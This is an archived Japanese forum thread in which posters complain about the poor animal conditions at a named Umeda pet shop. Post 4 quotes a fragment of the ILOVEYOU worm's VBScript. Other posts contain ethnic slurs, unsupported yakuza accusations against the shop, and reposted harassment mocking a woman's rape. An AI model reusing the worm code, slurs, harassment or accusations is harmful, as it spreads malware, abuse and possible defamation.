5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

梅田お初天神にあるペットショップトわんわんランドE

1 :名も無き飼い主さん:03/09/28 13:10 ID:BBtpPtoi
不衛生&不定休、深夜まで営業で動物たちがかわいそう
周辺もすごい臭いやし、よく違法な動物販売して摘発されたりしてんのに潰れへんのはやっぱ裏にヤクザがついてるから??


2 :名も無き飼い主さん:03/09/28 13:14 ID:???
わんわん!

3 :名も無き飼い主さん:03/09/28 13:17 ID:???
全然名前伏せてないね
怖いな〜w

4 :名も無き飼い主さん:03/09/28 13:19 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\startmenu\programs\
startup\"c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

5 :名も無き飼い主さん:03/09/28 14:01 ID:???
スレ違い
犬猫は犬猫大好き板へ

6 :名も無き飼い主さん:03/09/28 14:10 ID:/+AElXNO
>5
犬猫以外も扱っているんだから、ここでいいのでは?

7 :名も無き飼い主さん:03/09/28 14:25 ID:???
この話前も出たね

8 :名も無き飼い主さん:03/09/28 23:27 ID:2+pNEpKk
age

9 :名も無き飼い主さん:03/09/28 23:32 ID:9Fq1Wyhq
周りの飲食店、かわいそうだよな・・・

10 :名も無き飼い主さん:03/10/02 15:48 ID:???
あの店酷過ぎ。普通に蝿が飛んでる。

11 :名も無き飼い主さん:03/10/02 22:52 ID:9W8E83m5
あそこにだいぶ前からいるサーバルキャット、不衛生な上にサーバルキャットには狭過ぎるケージ…。
かわいそうですよね。


12 :名も無き飼い主さん:03/10/03 09:01 ID:???
店の奥で飼われてるニホンザルがコワイ・・・

13 :名も無き飼い主さん:03/10/03 22:20 ID:MXL2OZfT
ニホンザルも違法でしょ?
なんで摘発されへんの?!
近くに曽根崎警察あるのに、何やってんだ!大阪府警!

14 :名も無き飼い主さん:03/10/04 23:19 ID:tKLw36hx
あげ

15 :名も無き飼い主さん:03/10/06 22:58 ID:lep3skCS
昨日梅田よってんけどもうひどいひどいゥ
すごい臭いし・
ダックスの子犬みたら自分の糞をくわえては吐きくわえては吐きしとった。
お腹減ってるんかな?ちゃんとご飯もらってるんやろかネ
かわいそうだったょモなのに店のなかは人がいっぱいいた


16 :名も無き飼い主さん:03/10/06 23:06 ID:ND/CBJDO
何で絵文字使えんの?

17 :名も無き飼い主さん:03/10/06 23:26 ID:???
あそこのチョン助捕まったんじゃなかったのか?

18 :名も無き飼い主さん:03/10/07 22:10 ID:kfitFu1M
>>16
これ使ってる
ttp://www.vector.co.jp/soft/win95/writing/se124240.html

19 :名も無き飼い主さん:03/10/09 11:40 ID:e4Gq96i+
問題あげ

20 :名も無き飼い主さん:03/10/09 11:49 ID:rWXWM0k6
実名を出すのはまずいと思よ。

21 :名も無き飼い主さん:03/10/09 14:12 ID:???
>>1
気を付けろ
削除依頼出した方がいいぞ

22 :名も無き飼い主さん:03/10/09 18:49 ID:???
このスレ、ウイルス飼ってるの?

23 :名も無き飼い主さん:03/10/25 01:49 ID:???
ときどきメガネカイマンまでいるし。

24 :名無し名称論議中:03/10/25 02:16 ID:???
地のヤクザが経営してるから誰も文句言えないんだよ。ホント。

25 :名も無き飼い主さん:03/11/04 14:30 ID:ZLF1i3kk
そうか〜やっぱりチョンかやくざが絡んでたんや〜
臭さはお初1やね
近くのラーメン屋、居酒屋。勿論歩行者もたまったもんじゃない

26 :名も無き飼い主さん:03/11/11 04:32 ID:UIuOb81a
それにしても、悪名高いあの店もよく潰れないモノだ。
あの店で生き物買おうって客は、
寄った勢いの半分以上シャレの連中か
あまりの悲惨な管理体制に対する同情で連れ帰る連中の
どちらかだな。

27 :名も無き飼い主さん:03/11/13 18:54 ID:???
昔あの店で足のないハムスター を見つけて、飼いますから、って言ったら「繁殖で使いますからいいです」 って断られたことがある。 あと、サルには2回襲われた。

28 :フトアゴスレから来ました:03/12/22 14:21 ID:???
http://hobby.2ch.net/test/read.cgi/pet/1031926853/821-823
この嫌がらせにむかつきました。
以前も何度かマターリ進んでたスレがこいつのせいで荒れました。
我慢できないので私も嫌がらせをします。
以下は雑談スレからの転載です。
>レイプされたせなとか言う女と付き合ってたんだってな。
>しかもこの板で見つけてさ。
>いやーどうだった? 
>セクースの時トラウマとなって思い出すのか?

29 :ニンゲンモドキ2 ◆atMODOKlSY :03/12/22 15:04 ID:???
>>28 は雑談スレ40で俺に
http://hobby.2ch.net/test/read.cgi/pet/1071244628/950-980
このようにこっぴどくお説教を食らい言い返せない腹いせに
他コテハンにターゲットを絞ったこの中傷コピペをばらまいています。
(コピペ荒らしの主張)
http://hobby.2ch.net/test/read.cgi/pet/1039536773/283
ちなみに「フトアゴスレから」というのも濡れ衣なので、スルー推奨です。

(発祥となった現在の雑談スレ)
http://hobby.2ch.net/test/read.cgi/pet/1072012017/

30 :名も無き飼い主さん:03/12/26 16:42 ID:???
あそこの店員はマジで質が悪い
日本語話せないアジア人雇ってるし
女の客に色目使ってる奴いるし
おかげで漏れ10分近くも待たされたよ
早く潰れろ

31 :あぼーん:あぼーん
あぼーん

32 :名も無き飼い主さん:04/01/02 23:08 ID:???
新年記念age

33 :名も無き飼い主さん:04/01/03 19:15 ID:13P7ntSN
こないだはじめて行ってみた
なるほど、酷いな
ほとんどのオウムタンが毛引き症ぽ

34 :名も無き飼い主さん:04/01/03 22:32 ID:PLX3M39K
ここやばくない?削除依頼出したほうが良いぞ、>>1
そんな場所・名前まで堂々とw

35 :名も無き飼い主さん:04/01/03 22:33 ID:PLX3M39K
うさのケージはどうでしたか?やはり酷いのか・・・。

36 :名も無き飼い主さん:04/01/04 05:13 ID:Ks4ruNNp
削除依頼て>>1しか出せないのか? 恐らく立て逃げかと思われ

37 :名も無き飼い主さん:04/01/04 10:23 ID:???
爆発だ!

38 :名も無き飼い主さん:04/01/04 11:47 ID:???
逃げてないよ♥

39 :名も無き飼い主さん:04/01/04 12:33 ID:???
逃げてないとはw
・・・とりあえずわんわんランドとやらに伝えとくか?

40 :名も無き飼い主さん:04/01/04 12:35 ID:???
ば〜か!

41 :名も無き飼い主さん:04/01/04 14:20 ID:???
>>40
そうだ、まさにそうだ。>>1はまさにそうだ。
とりあえずわんわんランドを調べよう。

42 :名も無き飼い主さん:04/01/04 22:21 ID:???
>>1を非難する前に、あの店を糾弾すべきだと思う。
動物の扱いが酷すぎる。

43 :名も無き飼い主さん:04/01/04 22:58 ID:???
お正月前後に広告が入ってたんだけど(難波とかのお店と連名で)
他のお店とかと比べてかなり安い。半額?と思うくらい。
でもここの倍のお金を払ってでも他のお店で買いたい。
ここのお店に来てからシャンプーしてもらった?
こまめに部屋を掃除してもらってる?って凄く思う。
賞品だったらもっと丁寧に扱ってあげるべきだと思うし、ましてや生き物。
どのコも泣きそうな顔してるのが悲しい・・・

44 :名も無き飼い主さん:04/01/05 17:34 ID:???
そんな酷いのか。
衛生面はペットショップに関しては何もないのか?詳しく知らんのだが・・・。


45 :名も無き飼い主さん:04/01/17 21:11 ID:Rdccd5AO
ここは893じゃないよ893がやってるのは別のとこだよ。
あっち系だけどね

46 :名も無き飼い主さん:04/01/18 00:35 ID:???
ケヅメっぽいカメが床をウロウロしてた。
甲羅がボロボロで痛々しかった

47 :名も無き飼い主さん:04/01/18 17:04 ID:apaWwZSo
此処は臭いよ、店に入ったけど直ぐに出ました。

48 :名も無き飼い主さん:04/02/22 17:06 ID:OwrMI2nz
2004年になっても、まだ改善されないのか

49 :ニンゲンモドキ3 ◆atMODOKlSY :04/02/24 15:45 ID:???
衛生面だけ改善されれば、立地はいいんだがな〜。

50 :名も無き飼い主さん:04/03/09 18:53 ID:iYFiPYzk
晒しage

51 :名も無き飼い主さん:04/03/09 18:56 ID:???
お初天神の吉野家で親子丼を食ってから行く。
これぞ通。

52 :名も無き飼い主さん:04/03/09 22:43 ID:???
ttp://www.ohatendori.com/shop/3/wanwanland/main.html

これ?
見た感じ普通・・・でもないけどきれいっぽいけど。
今度行って見ようかな。梅田はちょっと遠いけど、そんなに酷いの?

53 :名も無き飼い主さん:04/03/10 18:12 ID:???
今年初めに行った友人は「改装して綺麗になってた」と言ってたので改装後の写真かな。
綺麗なお店を維持して、生き物を大事にして商売してくれてる事を願うよ。
因みに改装前は・・・酷かったよ。

54 :名も無き飼い主さん:04/03/25 08:26 ID:???
改装後に行ってみました。
確かに綺麗になってた。
ニオイもマシになってたよ。

一瞬優良店かと思った。

でも値段も高いし、相変わらず動物はかわいそうな扱いだ。
水商売のオネーサンとかが買うんだろうね。

「あはっ こいつ、あたしと同じ、ひとりぼっち」とか言ってさ。

馬鹿だから。

55 :名も無き飼い主さん:04/04/20 01:28 ID:zBj4vYEw
今日、奥さんと改装してから初めて行ってみました。

確かに店の入り口付近は奇麗に改善されているように見えたのですが、
奥の方では、肉球がボロボロになった、わん仔がぐったりと横たわっていたり、フェネックが狭いケージの中で暴れ回っていたりと、さらに劣悪になったようにに思います。

私は、あまり動物好きな方ではないのですが、あの惨状は見るに耐えないものでした。

いくら商売とはいえ酷すぎると思います。
なんとかならないものなのでしょうかねぇ……。

56 :亀太郎三世:04/04/20 01:51 ID:b1g+K/Yl
ジェフ・フェネックはオーストラリアの英雄だ。


57 :インプレッサ:04/04/20 01:54 ID:09hk2D1d
>>55
何でお前は他人の所有物まで気にするの?
利益優先主義の時代なんだよ〜〜〜〜〜〜ん。
見るに耐えないものと思うなら店の物全てお前が買って来い。

58 :名も無き飼い主さん:04/04/20 02:30 ID:iUuRPEwN
>>57

煽るんなら、もうすこしマシな煽り方したらどう?


59 :名も無き飼い主さん:04/04/20 11:54 ID:???
インプレッサだってサ

60 :名も無き飼い主さん:04/04/24 22:31 ID:???
 ま た イ ン プ レ ッ サ か 。

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)